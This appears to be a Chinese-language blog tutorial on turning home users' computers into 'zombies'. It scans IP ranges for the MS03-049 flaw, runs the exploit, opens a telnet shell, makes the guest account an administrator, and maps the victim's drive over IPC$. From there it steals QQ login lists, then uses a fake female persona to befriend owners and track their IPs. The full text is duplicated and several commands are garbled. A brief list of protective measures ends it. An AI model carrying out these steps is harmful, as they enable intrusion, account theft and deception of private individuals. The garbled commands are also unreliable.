我是怎样让一个动态IP地址成为我的肉鸡的?
首先到网站去下载X-scan扫描工具(要带ms03049漏洞扫描插件)和ms03049攻击程序
然后运行x-scan扫描工具,在扫描模块里选上ms03049,选择一个IP段开始扫描
扫到有ms03049漏洞的IP,在cmd命令方式下,c:\ms03049>ms03049 IP 2K
如果出现 can't find NetAddAlternateComputerName (Now try to attack 2k!)
87 或1726这样的数字,可能对方是NTFS格式,表明溢出不成功
如果出现 如果出现can't find NetAddAlternateComputerName (Now try to attack 2k!)下面光标闪动说明溢出成功
再新开一个cmd命令窗口 c:\>telnet ip 1234 等一会,如果成功的话,这时已经得到了一个shell了,接下来当然是把guest用户加入administrators组
net user guest /active:yes
net localgroup administrators /add
net guest "passwd" (这里最好是设置一个密码,不要为空哦,以免让别人扫描弱口令,把肉鸡就这样砍了,很心痛的,呵呵)
net share (查看对方的默认共享删了没?要是删了,在这里要开共享,下面要和对方建立IPC连接的)
然后是看对方有没有装QQ啦,在对方的盘里一个一个的找,如果对方有QQ,机会来了,哈哈
c:\>dir qq.exe /s 查找C盘看有没有qq.exe这个软件,没的话,那在D盘再找吧
d:\>dir qq.exe /s 如果在D盘找到qq.exe文件了,现在我们可以打exit退出对方的主机了
建议把找qq.exe文件放在前面一步做,还会好些.要是对方没有装QQ的话,就没必要et user guest /active:yes
net localgroup administrators /add
net guest "passwd"
这几步了,直接退出放弃,(记住这里说的都是动态IP用户,下次上网了IP地址就变了)
好了,现在已经有了对方的admin权限了,与对方建立IPC连接吧
net use \\ip /del(这一步不能少哦,因为在扫描的时候已经和对方建立了IPC空连接了)
net use \\ip\ipc$ "passwd" /user:"guest"
net use j: \\ipc\d$ (在这映射对方的D盘为我的电脑J盘,因为d盘装了QQ)
现在可以打开我的电脑,是不是多了一个J盘了,那就是对方的D盘,找到他的QQ目录.把QQ目录下的用户列表
文件LoginUinList.dat复制到自己的电脑里面去,然后找一下自己的QQ装在哪个盘,然后用这个文件,替换掉自己QQ目录下的
LoginUinList.dat这个文件,然后打开QQ登陆窗口,发现在用户列表里面的QQ号是不是变了?这些QQ号都是在对方机子上登陆的QQ号
QQ号排在第一的话,可能是对方正在用这个QQ,然后加他QQ,你就要想办法让他加你为好友哦,要是对方是boy的话,那你就做一次吧,换个女的QQ头象加他吧
这样他加你机会大一些,哈哈,一般男孩子都喜欢和女孩子聊天,这样是不是很缺德,呵呵,有点哦 (在这里最好把用户列表的QQ号都记下来,说不
定正在上QQ的人不是主人,可能是朋友在玩他的机子,那怎么办啊,当然是加下面的一些QQ号,总有一个是主人的,除非他不上QQ的)
加主人的QQ到底有什么目的呢?看到这里,可能你们也应该想到了,那就是用显IP的QQ版本可以查到对方的IP呢,菜菜鸟一般都不会用QQ代理的,
那这个IP就是对方的动态IP地址了,好了,现在对方只要上QQ我就可以知道对方的IP了,又有对方的电脑amdin权限了,现在想干什么就干什么了?
哈哈,是不是很爽啊,看了这之后,希望你们以后不要恶意攻击哦,这些动态IP用户一般都是些个人用户
最后写一下防止别人对你进行ms03049攻击的几种方法,因为我去扫描一段IP地址,有这个漏洞的用户太多了
1. 关了workstation服务
2. 把fat32格式盘转换成NTFS格式
3. 打上ms03049补丁
4. 在注册表里禁用IPC空连接 (这种方法不知道可不可以,我只知道ms03049漏洞扫描先要和对方的机子建立IPC空连接
首先到网站去下载X-scan扫描工具(要带ms03049漏洞扫描插件)和ms03049攻击程序
然后运行x-scan扫描工具,在扫描模块里选上ms03049,选择一个IP段开始扫描
扫到有ms03049漏洞的IP,在cmd命令方式下,c:\ms03049>ms03049 IP 2K
如果出现 can't find NetAddAlternateComputerName (Now try to attack 2k!)
87 或1726这样的数字,可能对方是NTFS格式,表明溢出不成功
如果出现 如果出现can't find NetAddAlternateComputerName (Now try to attack 2k!)下面光标闪动说明溢出成功
再新开一个cmd命令窗口 c:\>telnet ip 1234 等一会,如果成功的话,这时已经得到了一个shell了,接下来当然是把guest用户加入administrators组
net user guest /active:yes
net localgroup administrators /add
net guest "passwd" (这里最好是设置一个密码,不要为空哦,以免让别人扫描弱口令,把肉鸡就这样砍了,很心痛的,呵呵)
net share (查看对方的默认共享删了没?要是删了,在这里要开共享,下面要和对方建立IPC连接的)
然后是看对方有没有装QQ啦,在对方的盘里一个一个的找,如果对方有QQ,机会来了,哈哈
c:\>dir qq.exe /s 查找C盘看有没有qq.exe这个软件,没的话,那在D盘再找吧
d:\>dir qq.exe /s 如果在D盘找到qq.exe文件了,现在我们可以打exit退出对方的主机了
建议把找qq.exe文件放在前面一步做,还会好些.要是对方没有装QQ的话,就没必要et user guest /active:yes
net localgroup administrators /add
net guest "passwd"
这几步了,直接退出放弃,(记住这里说的都是动态IP用户,下次上网了IP地址就变了)
好了,现在已经有了对方的admin权限了,与对方建立IPC连接吧
net use \\ip /del(这一步不能少哦,因为在扫描的时候已经和对方建立了IPC空连接了)
net use \\ip\ipc$ "passwd" /user:"guest"
net use j: \\ipc\d$ (在这映射对方的D盘为我的电脑J盘,因为d盘装了QQ)
现在可以打开我的电脑,是不是多了一个J盘了,那就是对方的D盘,找到他的QQ目录.把QQ目录下的用户列表
文件LoginUinList.dat复制到自己的电脑里面去,然后找一下自己的QQ装在哪个盘,然后用这个文件,替换掉自己QQ目录下的
LoginUinList.dat这个文件,然后打开QQ登陆窗口,发现在用户列表里面的QQ号是不是变了?这些QQ号都是在对方机子上登陆的QQ号
QQ号排在第一的话,可能是对方正在用这个QQ,然后加他QQ,你就要想办法让他加你为好友哦,要是对方是boy的话,那你就做一次吧,换个女的QQ头象加他吧
这样他加你机会大一些,哈哈,一般男孩子都喜欢和女孩子聊天,这样是不是很缺德,呵呵,有点哦 (在这里最好把用户列表的QQ号都记下来,说不
定正在上QQ的人不是主人,可能是朋友在玩他的机子,那怎么办啊,当然是加下面的一些QQ号,总有一个是主人的,除非他不上QQ的)
加主人的QQ到底有什么目的呢?看到这里,可能你们也应该想到了,那就是用显IP的QQ版本可以查到对方的IP呢,菜菜鸟一般都不会用QQ代理的,
那这个IP就是对方的动态IP地址了,好了,现在对方只要上QQ我就可以知道对方的IP了,又有对方的电脑amdin权限了,现在想干什么就干什么了?
哈哈,是不是很爽啊,看了这之后,希望你们以后不要恶意攻击哦,这些动态IP用户一般都是些个人用户
最后写一下防止别人对你进行ms03049攻击的几种方法,因为我去扫描一段IP地址,有这个漏洞的用户太多了
1. 关了workstation服务
2. 把fat32格式盘转换成NTFS格式
3. 打上ms03049补丁
4. 在注册表里禁用IPC空连接 (这种方法不知道可不可以,我只知道ms03049漏洞扫描先要和对方的机子建立IPC空连接
回复Comments
作者:
{commentrecontent}